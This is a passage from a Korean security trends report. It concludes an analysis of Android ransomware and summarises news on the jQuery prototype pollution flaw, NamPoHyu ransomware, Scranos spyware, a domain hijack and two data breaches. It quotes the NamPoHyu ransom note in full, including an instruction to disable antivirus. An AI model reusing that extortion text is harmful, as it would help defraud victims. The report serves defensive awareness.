52 03 악성코드분석보고 [ 그림 10] 복호화이후기기상태확인 2.10 지속적인악성앱실행 기기가재실행되면악성앱을재시작한다. [ 그림 11] 부팅완료시악성앱재실행 50

53 03 악성코드분석보고 2.11 C&C 접속불가 C&C 를통해서키값을받아온후암호화를했기때문에, 현재 C&C 와접속이불가하여감염되면키값을찾을방법이 없어복호화가불가능하다. [ 그림 1] 현재접속불가한 C&C 서버 51

54 03 악성코드분석보고 3. 결론 해당악성앱은유명게임앱으로위장하여사용자를속인다. 감염되면자기자신을숨기며, 기기외부저장소의모든 파일과연락처를암호화한다. 또한, 암호화된파일에대한복호화비용을지불하지않으면기기의사용도불가하다. 특히, C&C 서버를통해서암호화키값을받아오는데현재 C&C 서버와연결이되지않아서감염이되고난이후라면 복호화할수있는방법이없어사용자들은매우주의해야한다. 52

55 이스트시큐리티보안동향보고서 04 글로벌보안동향 53

56 04 글로벌보안동향 jquery 자바스크립트라이브러리에서웹사이트취약점발견 jquery JavaScript library flaw opens the doors for attacks on hundreds of millions of websites 인기있는 jquery 자바스크립트라이브러리에서공격자가자바스크립트오브젝트의프로토타입을변조하도록허용할수있는프로토타입오염 (Prototype pollution) 결함이발견되었다. jquery 자바스크립트라이브러리는현재온라인전체웹사이트중 74% 에사용되고있으며, 사이트대부분이 프로토타입오염 결점에취약한라이브러리 1.x 와 2.x 버전을사용하고있었다. 해당라이브러리는금주이문제를수정하기위한보안패치를발표했다. 이는해당코드에서주요보안취약점이 발견된지 3 년만이다. 자바스크립트오브젝트는선정이된구조를기반으로다수값을저장하는데사용될수있는변수와같다. 프로토타입은 자바스크립트오브젝트의기본구조및기본값을정의하는데사용되며, 값이설정되지않았을경우예상구조를 지정하는데필수적이다. 자바스크립트오브젝트프로토타입을변조할수있는공격자는어플리케이션을충돌시키고예상된값을받지못할 경우행동을변경시킬수있게된다. 자바스크립트의사용현황을감안할때, 프로토타입오염결함악용은웹 어플리케이션에심각한영향을미칠것으로예상된다. jquery 라이브러리에존재하는이취약점 (CVE ) 은 Snyk 의연구원들이발견했으며, 프로토타입오염공격의 PoC 코드까지공개했다. 이보안취약점은프로토타입오염을나타내며, 공격자들이자바스크립트어플리케이션오브젝트프로토타입에덮어쓰기하도록허용한다. 이같은일이발생할경우, 공격자제어속성이오브젝트에주입되며, 자바스크립트예외를트리거해서비스거부를유발하거나공격자가삽입하는코드경로를강제로적용하도록어플리케이션소스코드를변조할수있게된다. 전문가들은공격자들이이취약점을악용할경우 jquery 라이브러리코드를사용하는웹앱에서관리자권한을 부여받을수있다는것을시연해보였다. 전문가에따르면, 다행히도이프로토타입오염문제는대규모공격에서악용이불가능한것으로나타났다. 익스플로잇 코드가타깃에따라다르게작성되어야하기때문이다. 어플리케이션에 jquery 자바스크립트라이브러리를사용하는웹개발자들은최신버전인 jquery 으로 업데이트하기를권고한다. 54

57 04 글로벌보안동향 jquery 팀은블로그를통해 jquery 은 jquery.extend (true, {}, ) 를사용할때발생하는의도하지않은행동들에대한수정사항을포함하고있다. 검사하지않은소스오브젝트가열거가능한 proto 속성을포함하고있을경우, 이는기존의 Object.prototype 을확장시킬수있다. 이수정사항은 jquery 에포함되어있으나, 이전 jquery 버전을패치하기위한 patch diff 도있다고밝혔다. [ 출처 ] 55

58 04 글로벌보안동향 원격 Samba 서버를노리는 NamPoHyu 바이러스랜섬웨어발견 'NamPoHyu Virus' Ransomware Targets Remote Samba Servers NamPoHyu Virus, MegaLocker Virus 라불리는새로운랜섬웨어패밀리가발견되었다. 이랜섬웨어는다른랜섬웨어들과는조금다른방법으로타깃을노린다. 공격자는랜섬웨어를로컬에서실행하여접근가능한 Samba 서버를원격으로암호화한다. 보통랜섬웨어감염은다른악성코드또는악성이메일첨부파일을통하거나, 공격자가컴퓨터나네트워크를해킹하여 암호화될컴퓨터에서발생한다. 하지만이새로운랜섬웨어는접근가능한 Samba 서버를찾아패스워드를 브루트포싱한후원격으로파일을암호화하고랜섬노트를생성한다. Shodan 검색결과, 50 만대에가까운 Samba 서버가이랜섬웨어의타깃이될가능성이있는것으로보인다. [ 출처 ] 다행히도암호화된파일을복호화할수있는방법이발견되었으며, emsisoft.com 에서확인할수있다. 56

59 04 글로벌보안동향 2019 년 3 월처음발견된 MegaLocker 2019 년 3 월, NAS 스토리지기기가 MegaLocker Virus 라는랜섬웨어에의해암호화되었다. 이랜섬웨어는.crypted 확장자를사용했으며,!DECRYPT_INSTRUCTION.TXT 라는랜섬노트를생성했다. 이랜섬노트는 alexshkipper@mail.ru 주소로생일, 휴가, 취미등기타개인이벤트와함께피해자의사진을첨부하여 이메일을보내라는내용을포함하고있었다. 피해자가개인으로증명될경우랜섬머니는 $250, 기업일경우 $1,000 으로책정되는것으로나타났다. [ 출처 ] FTP 를통해감염된것으로추측된다는제보가있었으나, 대부분은 NAS 기기가감염되었기때문에 Samba 를통해 암호화가이루어진다고추측하고있다. 4 월부터 NamPoHyu 라는이름으로변경돼 2019 년 4 월초, 피해자들은해당랜섬웨어가 NamPoHyu 로이름을변경하고암호화된파일에.NamPoHyu 확장자를 붙이기시작했다. 새버전의랜섬노트는이전과파일명은동일하며, Tor 지불사이트로랜섬머니를지불할것을안내했다. 57

60 04 글로벌보안동향 What happened to your files? All of your files were protected by a strong encryption with AES cbc-128 using NamPoHyu Virus. What does this mean? This means that the structure and data within your files have been irrevocably changed, you will not be able to work with them, read them or see them, it is the same thing as losing them forever, but with our help, you can restore them. The encryption key and ID are unique to your computer, so you are guaranteed to be able to return your files. Your unique id: [id] What do I do? You can buy decryption for 1000$. But before you pay, you can make sure that we can really decrypt any of your files. To do this: 1) Download and install Tor Browser ( ) 2) Open the web page in the Tor Browser and follow the instructions. FAQ: How much time do I have to pay for decryption? You have 10 days to pay for the ransom after decrypting the test files. The number of bitcoins for payment is fixed at the rate at the time of decryption of test files. Keep in mind that some exchangers delay payment for 1-3 days! Also keep in mind that Bitcoin is a very volatile currency, its rate can be both stable and change very quickly. Therefore, we recommend that you make payment within a few hours. 58

61 04 글로벌보안동향 How to contact you? We do not support any contact. What are the guarantees that I can decrypt my files after paying the ransom? Your main guarantee is the ability to decrypt test files. This means that we can decrypt all your files after paying the ransom. We have no reason to deceive you after receiving the ransom, since we are not barbarians and moreover it will harm our business. How do I pay the ransom? After decrypting the test files, you will see the amount of payment in bitcoins and a bitcoin wallet for payment. Depending on your location, you can pay the ransom in different ways. Use Google to find i nformation on how to buy bitcoins in your country or use the help of more experienced friends. Here are some links: - payment by bank card How can I decrypt my files? After confirmation of payment (it usually takes 8 hours, maximum 24 hours) you will see on this page ( ) a link to download the decryptor and your aes-key (for this, simply re-enter (refresh) this page a day after payment) Download the program and run it. Attention! Disable all anti-virus programs, they can block the work of the decoder! Copy aes-key to the appropriate field and select the folder to decrypt. The program will scan and decrypt all encrypted files in the selected folder and its subfolders. We recommend that you first create a test folder and copy several encrypted files into it to verify the decryption. 59

62 04 글로벌보안동향 About Bitcoins: About Tor Browser: <NamPoHyu Virus 랜섬노트 > 해당 Tor 사이트에는지불관련정보를얻기위해랜섬노트에표기된 ID 와함께 로이메일을 보내라는내용을확인할수있다. 랜섬머니는개인 $250, 기업 $1,000 상당의비트코인으로이전버전과동일한금액이다. [ 출처 ] Scranos: 빠르게진화하는루트킷지원스파이웨어발견 60

63 04 글로벌보안동향 Scranos: New Rapidly Evolving Rootkit-Enabled Spyware Discovered 루트킷을지원하는새로운강력한스파이웨어가발견되었다. 해커들은영상플레이어, 드라이버, 안티바이러스제품과 같은합법적인소프트웨어로위장한해적판프로그램에트로이목마를삽입하여배포했다. Scranos 로명명된이루트킷악성코드는작년처음발견되었으며, 아직까지개발중인것으로확인된다. 이악성코드는 지속해서진화하고있으며, 새로운컴포넌트를테스트하고이전컴포넌트를정기적으로개선하고있어더욱심각한 위협될것으로우려된다. Scranos 는로그인크리덴셜및다양한서비스의지불계정탈취, 브라우징히스토리및쿠키추출, 유튜브구독자생성, 광고표시, 페이로드다운로드및실행등의기능을가지고있다. 비트디펜더가공개한보고서에따르면, 이악성코드는감염된기기에디지털서명된루트킷드라이버를설치해 지속성을얻는다. 연구원들은공격자들이 Yun Yu Health Management Consulting (Shanghai) Co., Ltd 에발행된유효한디지털인증서를 부적절하게이용한것으로추측했다. 해당인증서는폐지되지않은상태이다. 이루트킷은 Shutdown 콜백을등록하고셧다운시, 해당드라이버는디스크에기록되며시작서비스키가 Registry 에 생성된다. 이루트킷악성코드에감염되면, 정식프로세스에다운로더를주입하고공격자가제어하는 C&C 서버와통신하게된다. 그리고하나또는그이상의페이로드를다운로드한다. 아래는데이터및패스워드탈취페이로드를나열한것이다. 패스워드및브라우징히스토리탈취페이로드 메인드로퍼가구글크롬, 크로미움, 모질라파이어폭스, 오페라, 마이크로소프트엣지, 인터넷익스플로러, 바이두브라우저및얀덱스로부터브라우저쿠키, 로그인크리덴셜을훔친다. 또한사용자의페이스북, 유튜브, 아마존, 에어비앤비계정으로부터쿠키및로그인정보를탈취할수있다. 확장프로그램인스톨러페이로드 이페이로드는크롬에애드웨어확장프로그램을설치하고사용자가방문하는모든 웹사이트에악성광고를표시한다. 일부샘플은 Chrome Filter, Fierce-tips, PDF Maker 와같은가짜브라우저확장 프로그램을설치한다. 스팀데이터탈취페이로드 이컴포넌트는피해자의스팀계정크리덴셜및정보를탈취해공격자의서버로전송한다. 설치된앱및게임, 하드코딩된버전등의정보를포함한다. 61

64 04 글로벌보안동향 피해자의계정으로페이스북과유튜브사용해 일부페이로드는피해자의계정으로여러웹사이트를사용할수도있다. 유튜버구독자페이로드 이페이로드는크롬을디버깅모드로실행해유튜브페이지를조작한다. 브라우저에영상을 시작하고, 음소거, 채널구독, 광고클릭등과같은행동을지시할수있다. [ 출처 ] 페이스북스패머페이로드 수집한쿠키와기타토큰을활용해공격자들은악성코드가다른사람들에게페이스북친구 신청을보내도록지시할수있다. 또한피해자의페이스북친구들에게악성안드로이드 APK 가포함된메시지를보낼 수있다. 안드로이드애드웨어앱 공식구글플레이스토어에서찾아볼수있는정식 Accurate scanning of QR code" 앱으로 위장한이악성코드는공격적으로광고를표시하며, 감염된피해자들을추적하고윈도우악성코드와동일한 C&C 서버를사용한다. 인기있는웹사이트로부터지불정보탈취 메인드롭퍼에포함된 DLL 의목록은아래와같다. 페이스북 DLL 지불정보, 친구목록, 관리하는페이지등사용자의페이스북계정과관련된정보를추출한다. 아마존 DLL 사용자의아마존계정에서정보를추출한다. 이 DLL 의특정버전은로그인된에어비앤비계정으로부터 정보를추출하도록설계되었다. 62

65 04 글로벌보안동향 Scranos 는주로인도, 루마니아, 브라질, 프랑스, 이탈리아, 인도네시아에서많이발견되었다. 이악성코드의가장 오래된샘플은 2018 년 11 월발견되었으며, 지난 12 월과 1 월엄청나게증가했지만 2019 년 3 월부터다른종류의 악성코드를전달했다. [ 출처 ] 러브라이브는우리가접수했다! 인기애니메이션도메인탈취 ラブライブは我々が頂いた! - 人気アニメ公式サイトでドメイン乗っ取りか 63

66 04 글로벌보안동향 인기애니메이션작품 ' 러브라이브! 시리즈의공식사이트가본래와는다른표시가나타나사용자들이혼란에빠졌다. 공식 Twitter 에서는원인에대해서조사중이라고공지하였으며, 사용자들의접속주의를당부하고있다. "LoveLive_staff" Twitter 공식계정에는아래와같은안내문을기재했다. 현재 러브라이브 시리즈공식사이트에서페이지내용을조작당해문제가보고되고있습니다. 현재 원인규명중이지만홈페이지방문자에게악의적인시도가이루어질가능성이있으므로, 접속을피하길 부탁드리겠습니다. 이사이트에접속하면, 러브라이브는우리가접수했다! 등범행성명이라할수있는메시지가표시된다. 또한 이관오퍼를하여전소유자가이관오퍼를승인했다 등으로설명하고있다. 이사이트의도메인 loveliveanime.jp 에대해서 Whois 정보를확인해보면 4 월 5 일업데이트되었으며, 소유자가기존의선라이즈에서 우에노카호 ( 上野かほ ) 라는인물로변경되어있다. 공식 Twitter 에서는이번문제에대해서원인을조사중이라고전했으며, 악의있는콘텐츠가표시되어열람자에게 영향을미칠우려도있다며접속을피해달라고요청하고있다. 또한, 향후대응에대해서는 Twitter 로안내하겠다고 전했다. [ 출처 ] 만건의개인정보가유출된 ' 타쿠파일빈 ', 패스워드확인및회원탈퇴신청할수있는특설사이트개설 481 万件の個人情報が漏えいした 宅ふぁいる便 パスワードの確認や退会申し込みができる特設サイトを開設 64

67 04 글로벌보안동향 파일전송서비스 타쿠파일빈 이악의적인부정접속으로약 481 만건의개인정보가유출되었다. 이사건으로해당 서비스운영회사인주식회사오지스종합연구소는 4 월 8 일, 유출된패스워드등을확인할수있는 타쿠파일빈 Web 특설사이트 를개설했다. 타쿠파일빈에서유출된정보는사용자의성명 / 생년월일등을포함하는개인정보와로그인 ID, 패스워드등이포함되어 있다. 오지스종합연구소측의발표에따르면, 로그인패스워드는암호화되어있지않으며, 4 만 2051 건의탈퇴자 정보도포함되어있다고밝혔다. 타쿠파일빈은 1 월 23 일에서비스를정지했다. 유출된정보를확인할수있는서비스제공시간은 9 시 ~17 시 45 분이다. 확인방법은등록된 ID( 메일주소 ) 를작성하고, 도착한인증코드를사용하여로그인한다. 그리고타쿠파일빈에등록되어있는패스워드를확인할수있다. 또한 회원탈퇴신청, 타쿠파일빈포인트교환기능이이용가능하다. 이서비스는타쿠파일빈의보유데이터에서최소한의항목을추출하고암호화등의보안처리를실시하여타쿠파일빈 시스템과는완전히분리된전혀다른환경 / 서비스상에별도시스템으로새롭게개발및구축한뒤에사용자에게 제공하고있다. [ 출처 ] 통판사이트 나나쓰호시 Gallery, 시큐리티코드포함한최대 3,086 건카드정보유출 (JR 규슈 ) 通販サイト ななつ星 Gallery に不正アクセス セキュリティコード含む最大 3,086 件カード情報流出 (JR 九州 ) 65

68 04 글로벌보안동향 4 월 12 일, 규슈 ( 九州 ) 여객철도주식회사는이회사가운영하는 나나쓰호시 in 규슈 관련상품을판매하는 나나쓰호시 Gallery ( 에서외부부정접속으로고객카드정보를포함한 개인정보의유출이발견되었다고발표했다 년 3 월 11 일오후 3 시경에결제대행회사에서 나나쓰호시 Gallery 사이트에서이용된신용카드정보가 유출된것같다는연락을받아알려지게되었다. 이회사에서는사이트유지보수관리를위탁하고있는시스템회사에 의뢰하여 11 일내로사이트를폐쇄했으며, 제 3 의조사기관인 P.C.F. FRONTEO 주식회사 에조사를의뢰했다. 3 월 28 일에제출된조사보고서에따르면, 외부해커가사이트의취약점을노리고악의적으로접속하였으며, 이 사이트를이용한모든고객의신용카드정보가유출된기록이확인되었다고전했다. 더불어이사이트에등록된기타 개인정보도유출되었을가능성이높다는사실도판명되었다. 유출가능성이있는정보는 2013 년 10 월 5 일 ( 사이트개설일 ) 부터 2019 년 3 월 11 일 ( 사이트폐쇄일 ) 까지사이트를이용한고객의개인정보로최대 7,996 명에이른다. 그리고크루즈트레인 나나쓰호시 in 규슈 차내에서고객이이용한신용카드는다른시스템을이용하고있기때문에유출사실이확인되지않고있다. 유출된개인정보는아래와같다. 1. 회원등록한고객 ( 카드정보등록존재 ): 최대 3,086 건 (2,816 명 ) - 카드번호, 유효기간, 보안코드유출 - 성명, 주소, 우편번호, 전화번호, FAX 번호, 성별, 생년월일, 메일주소, 직업, 암호화된패스워드, 암호화된비밀번호질의답유출가능성높음. 2. 회원등록한고객 ( 카드정보등록없음 ): 최대 3,148 명 - 성명, 주소, 우편번호, 전화번호, FAX 번호, 성별, 생년월일, 메일주소, 직업, 암호화된패스워드, 암호화된비밀번호 질의답유출가능성높음. 3. 해외고객 : 최대 36 명 - 성명, 주소, 우편번호, 전화번호, 메일주소유출가능성높음. 4. 나나쓰호시 in 규슈 에승차하여후일배송으로배송한정품을구입한고객 : 최대 1,288 명 성명, 주소, 우편번호, 전화번호유출가능성높음. 5. 회원등록한고객및 나나쓰호시 in 규슈 에승차한고객이배송한정품을배송지로지정한고객 : 최대 708 명 - 성명, 주소, 우편번호, 전화번호, FAX 번호유출가능성높음. 66

69 04 글로벌보안동향 이회사에서는 3 월 28 일에개인정보보호위원회, 규슈운수국, 후쿠오카현경찰본부에해당사건을보고하고결제대행 회사, 카드회사에도보고서의내용을공유했다. 회사측은 4 월 12 일부터개인정보가유출되었을가능성이있는고객에대해메일및우편으로사죄와경위에대해서서면으로송부했다. 또한카드회사와연계하여유출가능성이있는카드의거래모니터링을강화해부정이용방지에힘쓰고있다. 회사측은조사결과를바탕으로시스템보안대책과감시체제를강화하고재발방지구축과개인정보보호체제를정비할것이라고밝혔다. [ 출처 ] 67

70 ( 주 ) 이스트시큐리티 ( 우 ) 서울시서초구반포대로 3 이스트빌딩